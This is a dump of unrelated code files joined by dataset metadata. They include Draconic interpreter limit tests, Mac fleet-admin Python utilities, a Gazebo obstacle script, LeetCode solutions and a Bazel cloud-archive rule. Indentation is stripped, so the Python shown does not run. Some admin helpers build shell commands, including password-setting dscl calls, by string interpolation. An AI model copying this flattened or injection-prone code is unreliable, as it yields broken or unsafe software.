def pop(self, k):
retval = super().pop(k)
self.__approx_len__ -= 1
return retval
def __delitem__(self, key):
super().__delitem__(key)
self.__approx_len__ -= 1
return SafeDict
```
#### File: draconic/tests/test_limits.py
```python
import pytest
from draconic import DraconicInterpreter
from draconic.exceptions import *
from draconic.helpers import DraconicConfig
@pytest.fixture()
def i():
# 1000-size iterables, don't limit us by loops, signed 32b int limit
config = DraconicConfig(max_loops=99999999, max_const_len=1000, max_int_size=32)
return DraconicInterpreter(config=config)
def test_creating(i, e):
really_long_str = 'foo' * 1000
not_quite_as_long = 'f' * 999
i._names['long'] = really_long_str
i._names['lesslong'] = not_quite_as_long
# strings
with pytest.raises(IterableTooLong):
e(f"'{really_long_str}'")
# lists
with pytest.raises(FeatureNotAvailable): # we don't allow this
e(f"[*long, *long]")
def test_list(i, e):
e("long = [1] * 1000")
with pytest.raises(IterableTooLong):
e("long.append(1)")
with pytest.raises(IterableTooLong):
e("long.extend([1])")
with pytest.raises(IterableTooLong):
e("long.extend(long)")
# we should always be operating using safe lists
i.builtins['reallist'] = [1, 2, 3]
e("my_list = [1, 2, 3]")
assert isinstance(e("my_list + reallist"), i._list)
assert isinstance(e("reallist + my_list"), i._list)
e("my_list.extend(reallist)")
assert isinstance(e("my_list"), i._list)
def test_set(i, e):
i.builtins['range'] = range
e("long = set(range(1000))")
e("long2 = set(range(1000, 2000))")
with pytest.raises(IterableTooLong):
e("long.add(1000)")
with pytest.raises(IterableTooLong):
e("long.update(long2)")
with pytest.raises(IterableTooLong):
e("long.union(long2)")
with pytest.raises(IterableTooLong):
e("long.update({1000})")
# we should always be operating using safe sets
i.builtins['realset'] = {1, 2, 3}
e("my_set = {3, 4, 5}")
# these operations don't work because sets use bitwise ops and we don't allow those
# assert isinstance(e("my_set | realset"), i._set)
# assert isinstance(e("realset | my_set"), i._set)
e("my_set.update(realset)")
assert isinstance(e("my_set"), i._set)
assert isinstance(e("my_set.union(realset)"), i._set)
def test_dict(i, e):
i.builtins['range'] = range
e("long = dict((i, i) for i in range(1000))")
e("long2 = {i: i for i in range(1000, 2000)}")
with pytest.raises(IterableTooLong):
e("long.update(long2)")
with pytest.raises(IterableTooLong):
e("long.update({'foo': 'bar'})")
def test_that_it_still_works_right(i, e):
e("l = [1, 2]")
e("d = {1: 1}")
e("s = {1, 2}")
e("l.append(3)")
assert e("l") == [1, 2, 3]
assert isinstance(i.names['l'], i._list)
e("s.add(3)")
assert e("s") == {1, 2, 3}
assert isinstance(i.names['s'], i._set)
e("d.update({2: 2})")
assert e("d") == {1: 1, 2: 2}
assert isinstance(i.names['d'], i._dict)
def test_types(i, e):
# when we have a compound type as a builtin, users shouldn't be able to modify it directly...
i.builtins.update({'rl': [1, 2], 'rd': {1: 1, 2: 2}})
e("rl[1] = 3")
e("rd[2] = 3")
assert i.names['rl'] == [1, 2]
assert i.names['rd'] == {1: 1, 2: 2}
# but setting it to a name is fine
e("l = rl")
e("d = rd")
e("l[1] = 3")
e("d[2] = 3")
assert i.names['l'] == [1, 3]
assert i.names['d'] == {1: 1, 2: 3}
def test_types_again(i, e):
e("a = [1, 2, 3]")
e("b = list('123')")
assert type(i.names['a']) is type(i.names['b']) is i._list
e("a = {1, 2, 3}")
e("b = set('123')")
assert type(i.names['a']) is type(i.names['b']) is i._set
e("a = {1: 1, 2: 2}")
e("b = dict(((1, 1), (2, 2)))")
assert type(i.names['a']) is type(i.names['b']) is i._dict
def test_int_limits(e):
max_int = (2 ** 31) - 1
min_int = -(2 ** 31)
e(f"max_int = {max_int}")
e(f"min_int = {min_int}")
# result is too large
with pytest.raises(NumberTooHigh):
e("max_int + 1")
with pytest.raises(NumberTooHigh):
e("max_int - -1")
with pytest.raises(NumberTooHigh):
e("max_int * 2")
with pytest.raises(NumberTooHigh):
e("max_int << 1")
with pytest.raises(NumberTooHigh):
e("max_int * max_int")
with pytest.raises(NumberTooHigh):
e("2 ** 31")
with pytest.raises(NumberTooHigh):
e("2 << 31")
with pytest.raises(NumberTooHigh):
e("min_int - 1")
with pytest.raises(NumberTooHigh):
e("min_int + -1")
with pytest.raises(NumberTooHigh):
e("min_int * 2")
with pytest.raises(NumberTooHigh):
e("min_int << 1")
with pytest.raises(NumberTooHigh):
e("min_int * -min_int")
def test_int_limits_one_op(e):
max_int = (2 ** 31) - 1
min_int = -(2 ** 31)
e(f"max_int = {max_int}")
e(f"min_int = {min_int}")
# one operand is too large
e(f"over_max_int = {max_int + 1}")
e(f"under_min_int = {min_int - 1}")
with pytest.raises(NumberTooHigh):
e("over_max_int - 1")
with pytest.raises(NumberTooHigh):
e("1 - over_max_int")
with pytest.raises(NumberTooHigh):
e("over_max_int + -1")
with pytest.raises(NumberTooHigh):
e("-1 + over_max_int")
with pytest.raises(NumberTooHigh):
e("over_max_int * 1")
with pytest.raises(NumberTooHigh):
e("1 * over_max_int")
with pytest.raises(NumberTooHigh):
e("under_min_int - 1")
with pytest.raises(NumberTooHigh):
e("1 - under_min_int")
with pytest.raises(NumberTooHigh):
e("under_min_int + -1")
with pytest.raises(NumberTooHigh):
e("-1 + under_min_int")
with pytest.raises(NumberTooHigh):
e("under_min_int * 1")
with pytest.raises(NumberTooHigh):
e("1 * under_min_int")
def test_int_limits_not_floats(e):
max_int = (2 ** 31) - 1
min_int = -(2 ** 31)
e(f"max_int = {max_int}")
e(f"min_int = {min_int}")
# floats are fine
assert e("max_int * 1.5") == max_int * 1.5
assert e("max_int / 0.5") == max_int / 0.5
assert e("max_int // 0.5") == max_int // 0.5
assert type(e("max_int // 0.5")) is float
assert e("min_int * 1.5") == min_int * 1.5
assert e("min_int / 0.5") == min_int / 0.5
assert e("min_int // 0.5") == min_int // 0.5
assert type(e("min_int // 0.5")) is float
@pytest.mark.timeout(1) # list mult should be fast, even if we do it a lot
def test_list_mult_speed():
config = DraconicConfig(max_loops=10000, max_const_len=10000)
i = DraconicInterpreter(config=config)
expr = """
while True:
a = [0] * 10000
""".strip()
with pytest.raises(TooManyStatements):
i.execute(expr)
``` |
{
"source": "1duo/autokeras",
"score": 3
} |
#### File: autokeras/autokeras/metric.py
```python
from abc import abstractmethod
from sklearn.metrics import accuracy_score
class Metric:
@classmethod
@abstractmethod
def higher_better(cls):
pass
@classmethod
@abstractmethod
def compute(cls, prediction, target):
pass
class Accuracy(Metric):
@classmethod
def higher_better(cls):
return True
@classmethod
def compute(cls, prediction, target):
return accuracy_score(prediction, target)
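# Usage sketch (hypothetical values): Accuracy.compute([1, 0, 1], [1, 1, 1])
# scores 2/3, since two of the three labels agree.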
``` |
{
"source": "1dustindavis/IT-CPE",
"score": 3
} |
#### File: IT-CPE/adobe_tools/add_adobe.py
```python
import sys
import adobe_api
import adobe_tools
target_product = sys.argv[1]
me = ldap_lookup() # Replace this with your own user lookup method
email = me.email
firstname = me.first_name
lastname = me.last_name
country = 'US'
def log(message): print(message)  # minimal body; the original helper presumably just printed the message
try:
# Do I exist as a user?
if not adobe_tools.user_exists(email):
log("Creating account for %s" % email)
# Add the user
success = adobe_tools.add_federated_user(
email,
email,
firstname,
lastname,
country
)
if not success:
log("Failed to create account for %s" % email)
sys.exit(1)
# Does the user already have the product?
log("Checking to see if %s already has %s" % (email, target_product))
already_have = adobe_tools.does_user_have_product(email, target_product)
if already_have:
log("User %s already has product %s" % (email, target_product))
sys.exit(0)
# Add desired product
log("Adding %s entitlement to %s" % (target_product, email))
result = adobe_tools.add_products([target_product], email)
if not result:
log("Failed to add product %s to %s" % (target_product, email))
sys.exit(1)
log("Done.")
except adobe_api.AdobeAPIBadStatusException as e:
log("Encountered exception: %s" % e)
log(
"You were most likely rate limited - "
"this will automatically try again later. "
"Alternatively, please contact Help Desk."
)
exit(1)
```
#### File: IT-CPE/autodmg_cache_builder/autodmg_utility.py
```python
import subprocess
import os
import tempfile
import shutil
def run(cmd):
"""Run a command with subprocess, printing output in realtime."""
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
while proc.poll() is None:
l = proc.stdout.readline()
print l,
print proc.stdout.read()
return proc.returncode
def pkgbuild(root_dir, identifier, version, pkg_output_file):
"""Build a package from root_dir at pkg_output_file."""
cmd = [
'/usr/bin/pkgbuild',
'--root', root_dir,
'--identifier', identifier,
'--version', version,
pkg_output_file]
run(cmd)
def build_pkg(source, output, receipt, destination, cache_dir, comment=''):
"""
Construct package using pkgbuild.
source - the directory to build a package from
output - the name of the package file to build ('.pkg' is appended)
receipt - the receipt of the package
destination - the directory path to place the payload in
cache_dir - the directory to place the built package into
comment - A message to print out when building
"""
if os.path.isdir(source) and os.listdir(source):
print comment
pkg_name = '%s.pkg' % output
# We must copy the contents into a temp folder and build
prefix = 'cpe_%s' % receipt.split('.')[-1]
temp_dir = tempfile.mkdtemp(prefix=prefix, dir='/tmp')
pkg_dir = os.path.join(temp_dir, destination.lstrip('/'))
# Copy the contents of the folder into place
shutil.copytree(source, pkg_dir)
# Build the package
output_file = os.path.join(cache_dir, pkg_name)
pkgbuild(
temp_dir,
receipt,
'1.0',
output_file
)
# Clean up after ourselves
shutil.rmtree(temp_dir, ignore_errors=True)
# Return the path to the package
if os.path.isfile(output_file):
return output_file
# If nothing was built, return empty string
return ''
def populate_ds_repo(image_path, repo):
"""Move a built image into the DS repo."""
repo_hfs = os.path.join(repo, 'Masters', 'HFS')
image_name = os.path.basename(image_path)
if not image_path.endswith('.hfs.dmg') and image_path.endswith('.dmg'):
# DS masters must end in '.hfs.dmg'
print 'Renaming image to ".hfs.dmg" for DS support'
image_name = image_name.split('.dmg')[0] + '.hfs.dmg'
repo_target = os.path.join(repo_hfs, image_name)
if os.path.isfile(repo_target):
# If the target already exists, name it "-OLD"
newname = repo_target.split('.hfs.dmg')[0] + '-OLD.hfs.dmg'
print "Renaming old image to %s" % newname
os.rename(repo_target, newname)
# now copy the newly built image over
print "Copying new image to DS Repo."
print "Image path: %s" % image_path
print "Repo target: %s" % repo_target
shutil.move(image_path, repo_target)
```
#### File: lib/modules/casper_tools.py
```python
import urllib2
import xml.dom.minidom
import api_tools
import shell_tools
def configure(username):
"""
configure(ad_account)
Basic jamf enrollment
"""
shell_tools.run("jamf recon -realname '%s'" % username)
def flush_policies():
"""
flush_policies()
Flush all Casper policies. Requires root privileges.
"""
shell_tools.run("jamf flushPolicyHistory")
def get_casper_auth():
"""
get_casper_auth()
Enable interaction with the casper api, casper requires a BasicAuthHandler
"""
username = ''
password = ''
top_level_url = ''
return api_tools.auth_init(top_level_url, username, password)
def trigger_policy(policy):
"""
trigger_policy(policy)
Trigger a casper policy by passing the policy name
"""
return shell_tools.run("jamf policy -trigger %s" % (policy))["success"]
def query_casper(resource, id=None, opener=None):
"""
query_casper(resource, id=None, opener=None)
Fetch and parse XML from Casper API
Requires a resource and ID (see parse_network_segments for example)
https://casper.somedomain.com/apiFrontPage.rest
"""
if not opener:
opener = get_casper_auth()
urllib2.install_opener(opener)
url = "https://casper.somedomain.com/JSSResource/%s" % (resource)
if id:
url += "/id/%s" % (id)
try:
return xml.dom.minidom.parse(urllib2.urlopen(url))
except (urllib2.HTTPError, urllib2.URLError):
return None
```
#### File: lib/modules/sys_tools.py
```python
import hashlib
import os
import re
import signal
import subprocess
import syslog
import time
import shell_tools
import sys_tools
def activate_application(app_name):
"""
activate_application(app_name)
"""
launch_app = """osascript<<END
activate application "%s"
END""" % (app_name)
os.system(launch_app)
def create_local_account(user, full_name, password, admin=False, hidden=False):
"""
create_local_account(user, full_name, password, admin=False)
Creates a local account on the computer. If admin is True, This
account will be able to administer the computer
hidden=True will only work if the "hide500users" is set to true in the
loginwindow plist
"""
dscl_command = "dscl ."
home_dir = "/Users/%s" % user
uids = shell_tools.run(
"%s -list /Users UniqueID | awk \\'{print $2}\\'" % (dscl_command),
sanitize=False
)["stdout"].split()
next_id = map(int, uids)
next_id.sort()
next_id = next_id[-1]
# UIDs less than 500 are hidden, set it equal to 500 to be incremented
if next_id < 500:
if not hidden:
next_id = 500
# Increment by 1 for the next free UID
user_id = next_id + 1
# Create it manually as not to rely on casper
create_user_commands = [
"create %s" % home_dir,
"create %s UserShell /bin/bash" % home_dir,
"create %s RealName \\'%s\\'" % (home_dir, full_name),
"create %s UniqueID %s" % (home_dir, user_id),
"create %s PrimaryGroupID 1000" % home_dir,
"create %s NFSHomeDirectory%s" % (home_dir, home_dir),
"passwd %s \\'%s\\'" % (home_dir, password),
]
if admin:
create_user_commands.append(
"append /Groups/admin GroupMembership %s" % user
)
for command in create_user_commands:
shell_tools.run("%s %s" % (dscl_command, command))
def configure_time():
"""
configure_time()
Sync and enable to point to time_server variable
"""
# Turn the time setting off to force use ntpdate to sync
time_server = "time.apple.com"
time_commands = [
"systemsetup -setusingnetworktime off",
"ntpdate %s" % time_server,
"systemsetup -setusingnetworktime on",
"systemsetup -setnetworktimeserver %s" % time_server,
]
for command in time_commands:
shell_tools.run(command)
def enough_space(required_space):
"""
enough_space(required_space)
Returns whether there is enough space on the root volume given
the required_space
"""
# Enough space means the requirement fits while a ~3 GB buffer stays free
return get_free_hd_space("gigabytes") - required_space > 3
def get_computer_name():
"""
get_computer_name()
Returns the machine's computer name
"""
return shell_tools.run("scutil --get ComputerName")["stdout"]
def get_model(short=False):
"""
get_model(short=False)
Returns the machine's hardware model
"""
models = {
"Mac Pro": "pro",
"MacBook Air": "mba",
"MacBook Pro": "mbp",
"Mac mini": "mm",
"iMac": "im"
}
model = query_profiler(
"SPHardwareDataType", ["Hardware Overview", "Model Name"]
)
if short:
# Default to mac when not found
return models.get(model, "mac")
else:
return model
def get_os_version():
"""
get_os_version()
Returns the operating system version
"""
return shell_tools.run("sw_vers -productVersion")["stdout"]
def get_serial():
"""
get_serial()
Returns the machine's serial number
"""
return query_profiler(
"SPHardwareDataType", ["Hardware Overview", "Serial Number (system)"]
)
def get_shard(serial=None, salt=None, chunks=10):
"""
get_shard(serial=None, salt=None, chunks=10)
Returns the machine's unique shard number
serial => Pass a serial for another machine to get its shard
salt => Pass a salt to generate the hash
chunks => Pass an int to set number of chunks.
"""
md5 = hashlib.md5()
if not serial:
serial = get_serial()
if salt:
serial = str(serial) + str(salt)
md5.update(serial)
digest = md5.hexdigest()
number = int(digest, 16)
shard = number % int(chunks)
return shard
def get_total_memory():
"""
get_total_memory()
Returns the total memory in GBs
"""
total_memory = shell_tools.run('sysctl -a | grep hw.memsize')['stdout']
# hw.memsize reports bytes; 1024 ** 3 converts to GB
return (int(total_memory.split('=')[-1]) / (1024 ** 3))
def get_time_since(time, mode="secs"):
"""
get_time_since(time, mode="secs")
Returns the time since in seconds
mode options: years, weeks, days, hours, mins, secs
"""
now = shell_tools.get_unix_time()
unit = {
'years': 365 * 86400,
'weeks': 604800,
'days': 86400,
'hours': 3600,
'mins': 60,
'secs': 0,
}
since = now - time
if unit[mode] == 0:
return since
return since / unit[mode]
def get_used_memory():
"""
get_used_memory()
Returns the machine's used memory in MB
"""
get_top_memory = shell_tools.run(
'top -l 1 | grep PhysMem')['stdout'].split()
return get_top_memory[1]
def get_uptime():
"""
get_uptime()
Get system uptime in minutes.
"""
boot_time = int(shell_tools.run(
"sysctl -n kern.boottime")["stdout"].split()[3].strip(',')
)
return (shell_tools.get_unix_time() - boot_time) / 60
def query_profiler(
data_type,
path,
needle=None,
verbose=False,
ending=True,
numeric=False,
periods=True,
):
"""
query_profiler(data_type, path, needle=None, verbose=False,
ending=True, numeric=False, periods=True,)
needle: Needle to search for in haystack. Returns T/F and ignores
other conditions. Use path=[]
verbose: Ending parenthesis and their contents if they exist.
ending: Last word. "160 GB" => "160".
numeric: All non-numeric chars.
periods: All periods. Exclusive of numeric option.
Returns the value at the end of a path of keys.
Try: "SPStorageDataType",
["Macintosh HD", "Physical Volumes", "disk0s2", "Size"]
Options for keeping / removing part of the string. True = keep,
False = remove.
"""
output = subprocess.Popen(
["system_profiler", data_type], stdout=subprocess.PIPE).communicate()[0]
path_index = 0
if needle:
return needle in output
for line in output.splitlines():
if line.strip().startswith(path[path_index]):
if path_index >= len(path) - 1:
# Return only the value. Ignore "key: ".
value = line.strip()[len(path[path_index]) + 2:]
if not verbose:
# Chop off ending content in parenthesis if it exists.
if value[-1] == ")":
value = value[:value.find("(") - 1]
if not ending:
# Chop off last word of value.
value = value.rsplit(" ", 1)[0]
if not periods:
# Remove all periods.
value = re.sub(r"\.", "", value)
elif numeric:
# Remove non-numeric chars.
value = re.sub(r"\D", "", value)
return value
else:
path_index += 1
def launchctl_load(name_of_daemon):
"""
load_launch_daemon(name_of_daemon)
Loads the launch daemon
"""
shell_tools.run(
"launchctl load -w %s/%s" %
(sys_tools.get_sys_path('launchdaemons'), name_of_daemon)
)
def launchctl_reload(name_of_daemon):
"""
reload_launch_daemon(name_of_daemon)
Unloads the daemon, waits one second, then loads the daemon
"""
launchctl_unload(name_of_daemon)
sleep(secs=1)
launchctl_load(name_of_daemon)
def launchctl_unload(name_of_daemon):
"""
unload_launch_daemon(name_of_daemon)
Unloads the name of daemon
"""
sleep(secs=3)
shell_tools.run(
"launchctl unload -w %s/%s" %
(sys_tools.get_sys_path('launchdaemons'), name_of_daemon)
)
def log(tag, message):
"""
log(tag, message)
Writes the tag and message to the syslog
"""
syslog.openlog(tag)
syslog.syslog(syslog.LOG_ALERT, message)
def logout():
"""
logout()
Logs the current user out of the GUI
"""
logout = """osascript<<END
tell application "System Events" to logout
END"""
os.system(logout)
def get_hd_capacity():
"""
get_hd_capacity()
Get the main HD's capacity in gigabytes (float)
"""
# Determine HD name
hd_name = get_hd_name()
return float(query_profiler(
"SPStorageDataType", [hd_name, "Capacity"], ending=False)
)
def get_free_hd_space(unit):
"""
get_free_hd_space(unit)
Get the main HD's free space in gigabytes, will convert to bytes, megabytes,
or gigabytes if specified
"""
gigabyte_size = 1024
megabyte_size = 1048576
# Determine HD name
hd_name = get_hd_name()
# Query_profiler returns free space in GB as a string
free_space = query_profiler(
"SPStorageDataType", [hd_name, "Available"], ending=False)
free_space = int(float(free_space))
if unit == "gigabytes":
return free_space
if unit == "megabytes":
return free_space * gigabyte_size
if unit == "bytes":
return (free_space * gigabyte_size) * megabyte_size
def get_hd_name():
"""
get_hd_name()
Returns the root hard drive name
"""
hd_name = shell_tools.run(
"diskutil info / | grep Volume | grep Name"
)["stdout"].split()[2:]
return " ".join(hd_name)
def get_hd_used_space():
"""
get_hd_used_space()
Returns the amount of space used on the machine (float)
"""
capacity = float(get_hd_capacity())
available = float(get_free_hd_space("gigabytes"))
return capacity - available
def install_pkg(pkg, base_dir='/'):
"""
install_pkg(pkg, base_dir='/')
Use the installer utility to install packages in root(/) by default
"""
install_cmd = '/usr/sbin/installer -pkg %s -target %s' % (pkg, base_dir)
install_results = shell_tools.run(install_cmd)
if not install_results['success']:
raise Exception(install_results['stderr'], install_results['stdout'])
def is_process_running(process):
"""
is_process_running(process)
Checks to see if a process is running.
"""
all_processes = os.popen("ps -Af").read()
return process in all_processes
def is_desktop():
"""
is_desktop():
Returns whether or not the machine is a desktop
"""
return not is_laptop()
def is_laptop():
"""
is_laptop():
Returns whether or not the machine is a laptop
"""
return 'book' in get_model().lower()
def kill_process(pid):
"""
kill_process(pid)
Kills a process given a pid
"""
try:
os.kill(int(pid), signal.SIGKILL)
except OSError:
print "No process running."
def set_machine_name(hostname):
"""
set_machine_name(hostname)
Sets the machine's hostname
"""
shell_tools.run("scutil --set ComputerName %s" % hostname)
shell_tools.run("scutil --set LocalHostName %s" % hostname)
def sleep(secs=None, mins=None, hrs=None, days=None):
"""
sleep(secs=None, mins=None, hrs=None, days=None)
Sleeps for a given duration
"""
sleep_time = secs
if mins:
sleep_time = 60 * mins
if hrs:
sleep_time = 60 * 60 * hrs
if days:
sleep_time = 60 * 60 * 24 * days
time.sleep(sleep_time)
def verify_hd_name():
"""
verify_hd_name()
Verify that the disk is named "Macintosh HD," otherwise rename it
"""
if get_hd_name() != "Macintosh HD":
shell_tools.run("diskutil rename / \"Macintosh\ HD\"")
``` |
{
"source": "1E0-may/path_follower",
"score": 2
} |
#### File: 1E0-may/path_follower/build_obstacles.py
```python
import numpy as np
import pandas as pd
import os
OBS_FILE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"src", "rosbot_navigation", "src", "obs.csv")
OBS_TEMPLATE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"src", "rosbot_gazebo", "obstacles", "obstacle_{}.urdf")
OBS_LAUNCH_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"src", "rosbot_gazebo", "launch", "obstacles.launch")
CYLINDER_TEMPLATE_URDF = """<robot name="obstacle_{}">
<link name="obstacle_{}">
<inertial>
<origin xyz="{} {} 0" />
<mass value="1000.0" />
<inertia ixx="1000.0" ixy="0.0" ixz="0.0" iyy="1000.0" iyz="0.0" izz="1000.0" />
</inertial>
<visual>
<origin xyz="{} {} 0"/>
<geometry>
<cylinder radius="{}" length="0.1" />
</geometry>
</visual>
<collision>
<origin xyz="{} {} 0"/>
<geometry>
<cylinder radius="{}" length="0.1" />
</geometry>
</collision>
</link>
<gazebo reference="obstacle_{}">
<static>true</static>
<material>Gazebo/Blue</material>
</gazebo>
</robot>"""
OBST_URDF = """
<node name="spawn_obj_{}" pkg="gazebo_ros" type="spawn_model"
args="-urdf -file $(find rosbot_gazebo)/obstacles/obstacle_{}.urdf -urdf -model obstacle_{}"
respawn="false" output="screen" />
"""
def calculate_radius(mu, alpha):
"""
BUILD THIS FUNCTION TO RETURN A VALUE IN METERS
"""
return float(mu + alpha) / 10.
def main():
obs = pd.read_csv(OBS_FILE_PATH, header=None)
launch = open(OBS_LAUNCH_PATH, "w+")
launch.write("""<?xml version="1.0" encoding="UTF-8"?>\n<launch>""")
for idx, o in enumerate(obs.values.astype(float).reshape((2, -1))):
r = calculate_radius(o[2], o[3])
if r <= 0:
continue
temp_obs = CYLINDER_TEMPLATE_URDF.format(idx+1, idx+1,
o[0], o[1],
o[0], o[1], r,
o[0], o[1], r,
idx+1)
with open(OBS_TEMPLATE_PATH.format(idx + 1), "w+") as f:
f.write(temp_obs)
launch.write(OBST_URDF.format(idx + 1, idx + 1, idx + 1))
launch.write("""</launch>""")
launch.close()
if __name__ == "__main__":
main()
``` |
{
"source": "1e0ndavid/1e0ndavid.github.io",
"score": 3
} |
#### File: 1e0ndavid.github.io/leetcode/lc509.py
```python
class Solution:
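# fib1 is the naive O(2^N) recursion; fib2 and fib3 compute the same
# recurrence iteratively in O(N) time and O(1) space.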
def fib1(self, N: int) -> int:
res = [0, 1]
if N <= 1:
return res[N]
else:
return self.fib1(N-1) + self.fib1(N-2)
def fib2(self, N: int) -> int:
res = [0, 1]
if N <= 1:
return res[N]
else:
fibNminusOne = 0
fibNminusTwo = 1
for _ in range(N):
fibN = fibNminusOne + fibNminusTwo
fibNminusTwo, fibNminusOne = fibNminusOne, fibN
return fibN
def fib3(self, N: int) -> int:
fibNminusOne, fibNminusTwo = 0, 1
for _ in range(N):
fibNminusTwo, fibNminusOne = fibNminusOne, fibNminusOne + fibNminusTwo
return fibNminusOne
def fib4(self, N: int) -> int:
return 0
if __name__ == '__main__':
s = Solution()
for i in range(11):
print(s.fib1(i), s.fib2(i), s.fib3(i))
```
#### File: 1e0ndavid.github.io/leetcode/plot_mission.py
```python
import random
import matplotlib.pyplot as plt
import re
def plot_scatter(missions):
plt.figure(figsize=(10, 6))
for m in missions:
x, y = missions[m][0], missions[m][1]
if x + y >= 5:
clr = 'r'
elif x + y == 4:
clr = 'b'
else:
clr = 'y'
rd1, rd2 = random.uniform(-0.1, 0.1), random.uniform(-0.1, 0.1)
plt.scatter(x + rd1, y + rd2, marker='x', color=clr)
plt.annotate(m, (x + rd1, y + rd2), fontsize=10)
plt.ylabel('Importance')
plt.xlabel('Urgency')
plt.grid()
plt.savefig("missions.png")  # save before show, or the written file is blank
plt.show()
if __name__ == "__main__":
filename = "missions"
with open(filename) as f:
data = f.readlines()
missions = {}
for line in data:
name = line.split()[2]
quantities = list(map(int, re.findall(r'\d', line)[-2:]))
missions.update({name: quantities})
plot_scatter(missions)
``` |
{
"source": "1e100/cloud_archive",
"score": 3
} |
#### File: 1e100/cloud_archive/cloud_archive.bzl
```python
def validate_checksum(repo_ctx, url, local_path, expected_sha256):
# Verify checksum
sha256_path = repo_ctx.which("sha256sum")
repo_ctx.report_progress("Checksumming {}.".format(local_path))
sha256_result = repo_ctx.execute([sha256_path, local_path])
if sha256_result.return_code != 0:
fail("Failed to verify checksum: {}".format(sha256_result.stderr))
sha256 = sha256_result.stdout.split(" ")[0]
if sha256 != expected_sha256:
fail("Checksum mismatch for {}, expected {}, got {}.".format(
url,
expected_sha256,
sha256,
))
def extract_archive(repo_ctx, local_path, strip_prefix, build_file, build_file_contents):
bash_path = repo_ctx.os.environ.get("BAZEL_SH", "bash")
if local_path.endswith(".tar.zst") or local_path.endswith(".tzst"):
# Recent TAR supports zstd, if the compressor is installed.
zst_path = repo_ctx.which("zstd")
if zst_path == None:
fail("To decompress .tar.zst, install zstd.")
tar_path = repo_ctx.which("tar")
if tar_path == None:
fail("To decompress .tar.zst, install tar.")
extra_tar_params = []
if strip_prefix != None and strip_prefix:
# Trick: we need to extract a subdir, and remove its components
# from the path. We do so via `tar xvf file.tar.zst sub/dir
# --strip-components=N`. Here we figure out the N.
num_components = 0
prefix = strip_prefix.strip("/")
for c in prefix.split("/"):
if len(c) > 0:
num_components += 1
extra_tar_params = [prefix, "--strip-components=" + str(num_components)]
# Decompress with tar, piping through zstd internally, and stripping prefix
# if requested.
tar_cmd = [tar_path, "-x", "-f", local_path] + extra_tar_params
repo_ctx.execute(tar_cmd)
else:
# Extract the downloaded archive using Bazel's built-in decompressors.
repo_ctx.extract(local_path, stripPrefix = strip_prefix)
# Provide external BUILD file if requested; `build_file_contents` takes
# priority.
if build_file_contents:
repo_ctx.execute([bash_path, "-c", "rm -f BUILD BUILD.bazel"])
repo_ctx.file("BUILD.bazel", build_file_contents, executable = False)
elif build_file:
repo_ctx.execute([bash_path, "-c", "rm -f BUILD BUILD.bazel"])
repo_ctx.symlink(build_file, "BUILD.bazel")
def cloud_archive_download(
repo_ctx,
file_path,
expected_sha256,
provider,
patches,
patch_args,
bucket = "",
strip_prefix = "",
build_file = "",
build_file_contents = "",
profile = ""):
""" Securely downloads and unpacks an archive from Minio, then places a
BUILD file inside. """
filename = repo_ctx.path(file_path).basename
# Download tooling is pretty similar, but commands are different. Note that
# Minio does not support bucket per se. The path is expected to contain what
# you'd normally feed into `mc`.
if provider == "minio":
tool_path = repo_ctx.which("mc")
src_url = file_path
cmd = [tool_path, "cp", "-q", src_url, "."]
elif provider == "google":
tool_path = repo_ctx.which("gsutil")
src_url = "gs://{}/{}".format(bucket, file_path)
cmd = [tool_path, "cp", src_url, "."]
elif provider == "s3":
tool_path = repo_ctx.which("aws")
extra_flags = ["--profile", profile] if profile else []
src_url = "s3://{}/{}".format(bucket, file_path)
cmd = [tool_path] + extra_flags + ["s3", "cp", src_url, "."]
elif provider == "backblaze":
# NOTE: currently untested, as I don't have a B2 account.
tool_path = repo_ctx.which("b2")
src_url = "b2://{}/{}".format(bucket, file_path)
cmd = [tool_path, "download-file-by-name", "--noProgress", bucket, file_path, "."]
else:
fail("Provider not supported: " + provider.capitalize())
if tool_path == None:
fail("Could not find command line utility for {}".format(provider.capitalize()))
# Download.
repo_ctx.report_progress("Downloading {}.".format(src_url))
result = repo_ctx.execute(cmd, timeout = 1800)
if result.return_code != 0:
fail("Failed to download {} from {}: {}".format(src_url, provider.capitalize(), result.stderr))
# Verify.
filename = repo_ctx.path(src_url).basename
validate_checksum(repo_ctx, file_path, filename, expected_sha256)
# Extract
extract_archive(repo_ctx, filename, strip_prefix, build_file, build_file_contents)
# If patches are provided, apply them.
if patches != None and len(patches) > 0:
patches = [str(repo_ctx.path(patch)) for patch in patches]
# Built in Bazel patch only supports -pN or no parameters at all, so we
# determine if we can use the built in patch.
only_strip_param = (patch_args != None and
len(patch_args) == 1 and
patch_args[0].startswith("-p") and
patch_args[0][2:].isdigit())
strip_n = 0
if only_strip_param:
strip_n = int(patch_args[0][2:])
if patch_args == None or only_strip_param:
# OK to use built-in patch.
for patch in patches:
repo_ctx.patch(patch, strip = strip_n)
else:
# Must use extrenal patch. Note that this hasn't been tested, so it
# might not work. If it's busted, please send a PR.
patch_path = repo_ctx.which("patch")
for patch in patches:
patch_cmd = [patch_path] + patch_args + ["-i", patch]
result = repo_ctx.execute(patch_cmd)
if result.return_code != 0:
fail("Patch {} failed to apply.".format(patch))
def _cloud_archive_impl(ctx):
cloud_archive_download(
ctx,
ctx.attr.file_path,
ctx.attr.sha256,
provider = ctx.attr._provider,
patches = ctx.attr.patches,
patch_args = ctx.attr.patch_args,
strip_prefix = ctx.attr.strip_prefix,
build_file = ctx.attr.build_file,
build_file_contents = ctx.attr.build_file_contents,
profile = ctx.attr.profile if hasattr(ctx.attr, "profile") else "",
bucket = ctx.attr.bucket if hasattr(ctx.attr, "bucket") else "",
)
minio_archive = repository_rule(
implementation = _cloud_archive_impl,
attrs = {
"file_path": attr.string(
mandatory = True,
doc = "Path to the file on minio. Backend needs to be set up locally for this to work.",
),
"sha256": attr.string(mandatory = True, doc = "SHA256 checksum of the archive"),
"build_file": attr.label(
allow_single_file = True,
doc = "BUILD file for the unpacked archive",
),
"build_file_contents": attr.string(doc = "The contents of the build file for the target"),
"patches": attr.label_list(doc = "Patches to apply, if any.", allow_files = True),
"patch_args": attr.string_list(doc = "Arguments to use when applying patches."),
"strip_prefix": attr.string(doc = "Prefix to strip when archive is unpacked"),
"_provider": attr.string(default = "minio"),
},
)
s3_archive = repository_rule(
implementation = _cloud_archive_impl,
attrs = {
